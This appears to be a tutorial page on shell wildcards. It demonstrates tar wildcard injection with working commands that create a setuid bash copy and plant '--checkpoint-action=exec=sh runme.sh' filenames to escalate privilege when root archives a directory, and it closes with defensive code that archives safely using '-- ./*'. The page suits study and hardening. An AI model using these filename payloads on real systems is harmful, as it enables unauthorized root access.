Wildcard

A wildcard is a character or set of characters that can be used as a replacement for some range/class of characters. Wildcards are expanded by the shell before any other action is taken, so the command receives the matching filenames as ordinary arguments.

Some wildcard characters:

* An asterisk matches any number of characters in a filename, including none.

? The question mark matches any single character.

[ ] Brackets enclose a set of characters, any one of which may match a single character at that position.

- A hyphen used within [ ] denotes a range of characters.

~ A tilde at the beginning of a word expands to the name of your home directory. If you append another user's login name to the tilde, it refers to that user's home directory.

Example: Vulnerable script: tar cf archive.tar *

By using tar with the --checkpoint-action option, a specified action can be run when a checkpoint is reached. This action could be a malicious shell script that executes arbitrary commands as the user who starts tar. "Tricking" root into using these options is quite easy, and that's where the wildcard comes in handy: the shell expands * to every filename in the directory, and tar parses any name that begins with -- as an option.

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh

touch /home/user/--checkpoint=1

touch /home/user/--checkpoint-action=exec=sh\ runme.sh

or

echo "" > "--checkpoint-action=exec=sh runme.sh"

echo "" > --checkpoint=1

Tool: wildpwn
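
For the defensive side, here is an added example (not from the original page) that lists option-like filenames in a directory and archives it so that no filename is parsed as a tar option. The function names and the sample directory are constructed for illustration, and the sample action is a harmless touch.

```shell
#!/bin/sh
# Added example: constructed data, hypothetical function names.
# Vulnerable form from the page:   tar cf archive.tar *
#   The shell expands * first, so a file named --checkpoint=1 reaches tar as an option.

# list_option_like DIR: print entries in DIR whose names start with '-',
# i.e. names that a bare * would hand to a command as options.
list_option_like() {
    find "$1" -maxdepth 1 -name '-*' -print
}

# safe_archive DIR OUT: archive the contents of DIR into OUT (absolute path).
# './*' makes every expanded name start with './' and '--' ends option parsing,
# so no filename can be read as a tar option.
safe_archive() {
    ( cd "$1" && tar cf "$2" -- ./* )
}

# make_sample_dir: build a constructed scratch directory with one normal file and
# two option-like names (the action is a harmless 'touch MARKER'); prints its path.
make_sample_dir() {
    d=$(mktemp -d) || return 1
    touch "$d/notes.txt" "$d/--checkpoint=1" \
          "$d/--checkpoint-action=exec=touch MARKER"
    printf '%s\n' "$d"
}

# Demo on the constructed directory.
dir=$(make_sample_dir)
echo "option-like names:"; list_option_like "$dir"
safe_archive "$dir" "$dir.tar" && tar tf "$dir.tar"
[ -e "$dir/MARKER" ] && echo "checkpoint action ran" || echo "no action ran"
rm -rf "$dir" "$dir.tar"
```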
